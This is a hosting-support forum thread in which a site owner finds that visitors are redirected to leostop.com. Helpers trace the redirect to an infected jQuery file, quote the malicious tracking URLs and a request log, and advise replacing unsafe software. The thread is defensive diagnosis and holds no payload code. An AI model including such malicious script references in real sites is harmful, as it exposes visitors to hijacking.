Website gets forwarded to malicious website

SysAdmin2022 · January 17, 2022, 5:29pm

Username epiz_30276383

I hosted my domain to point to the hosting here. It worked well for a few days, now, when anyone visits my website, it goes to a malicious website leostop

Then the user goes back and the website works fine.

Can anyone suggest what’s happening?

wackyblackie · January 17, 2022, 5:38pm

What is the domain name?

jaikrishna.t · January 17, 2022, 5:50pm

Rule of thumb, no clear information results with nothing.

SysAdmin2022 · January 17, 2022, 5:58pm

http://myosys.us

wackyblackie · January 17, 2022, 6:12pm

It is fine for me. Try clearing your cache. Some adverts redirect to suspicious sites, so remove any disreputable advertisers.

SysAdmin2022 · January 17, 2022, 6:32pm

I just tried from a different laptop

typed website name
first it said it is going to a “non trusted” site, do you want to continue
when i click “Continue” it goes to myosys.us homepage them immediately goes to

https://leostop.com/tracking/tracking.php?full_url=http://myosys.us/

It then says “the site has been reported unsafe”

the same behavior was also reported by someone else whom I asked to visit the website

wackyblackie · January 17, 2022, 6:34pm

Try from a different network, such as a cellular network. Then does it work?

Admin · January 17, 2022, 8:05pm

I’m pretty sure it’s not our hosting. A quick Google search for that domain doesn’t redirect a lot of results, but it does show a few sites which are not hosted with us.

So my money is on something like malicious code on your website (this can happen with outdated or pirated software), a virus on your computer or an malicious party in your network intercepting and redirecting traffic.

SysAdmin2022 · January 17, 2022, 8:32pm

Thank you for your confirmation and inputs.

Appreciate

Oxy · January 17, 2022, 10:37pm

By this it turns out that your jquery is infected
It is easily possible that someone pushed the obfuscated code inside or otherwise hid it

Request 27: http://leostop.com/tracking/tracking.js?_=1642457157955

URL: http://leostop.com/tracking/tracking.js?_=1642457157955
Host: leostop.com
IP: 172.67.196.212
Error/Status Code: 301
Priority: Low
Protocol: http/1.1
Initiated By: http://www.myosys.us/js/jquery-3.4.1.min.js line 1 column 82241
Request Start: 1.576 s
DNS Lookup: 70 ms
Initial Connection: 75 ms
Time to First Byte: 122 ms
Bytes In (downloaded): 0.0 KB
Bytes Out (uploaded): 0.9 KB

Request Headers:

Host: leostop.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 PTST/211207.195343
Accept: /
Referer: http://www.myosys.us/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

Response Headers:

HTTP/1.1 301 Moved Permanently
Date: Mon, 17 Jan 2022 22:05:58 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 17 Jan 2022 23:05:58 GMT
Location: https://leostop.com/tracking/tracking.js?_=1642457157955
Report-To: {“endpoints”:[{“url”:“https://a.nel.cloudflare.com/report/v3?s=JX%2F91IJhpu8a4whz5XjU46Hkp1fmjyqKPrM8IR6oBNtTfjQdrRYBkjVZWTZ1%2Fqtsghtdm1fqdzL%2FINArHX2nhzEv42I6a5R%2FTCSwetSRIhX%2Fl%2BvjmEkdxJZKF7YiyA%3D%3D”}],“group”:“cf-nel”,“max_age”:604800}
NEL: {“success_fraction”:0,“report_to”:“cf-nel”,“max_age”:604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 6cf2e356b85882f9-IAD
alt-svc: h3=“:443”; ma=86400, h3-29=“:443”; ma=86400

Or you use some demo or unpurchased software (pirated)
so the author checks if the host is valid (for which someone bought some software), and if not, then throw out the error and make a redirection.

And you should definitely do a jQuery script update if possible and if everything works

You are not the only one who has this problem

SysAdmin2022 · January 17, 2022, 11:47pm

Thank you so much for this info

I am new for jquery. Can you please guie me if
I shall I just re-upload my files? or shall i remove those references in jquery file?

are there any resolutions steps somewhere ?

wackyblackie · January 17, 2022, 11:53pm

You are better off using up-to-date CDN hosted jQuery.
I use JsDelivr CDN. Here’s how to include their jQuery:

<script src="https://cdn.jsdelivr.net/npm/[email protected]/src/core.min.js" crossorigin="anonymous"></script>

Admin · January 18, 2022, 1:24pm

It depends on how the malware came to be there in the first place. So no, we have no step by step way to fix this, because there are a lot of variables to account for.

For starters, you should take a good look at the software you’re using:

Is the software being actively developed and maintained, and are you running the latest, or at least supported, version?
Is the software being developed by a reliable party? A well known company is a safer source than some random person on a forum.
Did you get the software from a reliable source? So a distribution channel linked to by the software author, not some random file sharing sites you found through Google.

If the software is outdated, built by someone with either bad intentions or someone who just isn’t good at writing safe code, or retrieved from an unreliable third party source, your best bet is to wipe the entire site and start over. And go for software which is safe if you do.

Replacing the infected jQuery can help, but not if it’s just one symptom of unsafe, malware infected software.

Greenreader9 · January 19, 2022, 10:23pm

A post was split to a new topic: Website forwarded to malicious site

system · January 26, 2022, 10:24pm

This topic was automatically closed 7 days after the last reply. New replies are no longer allowed.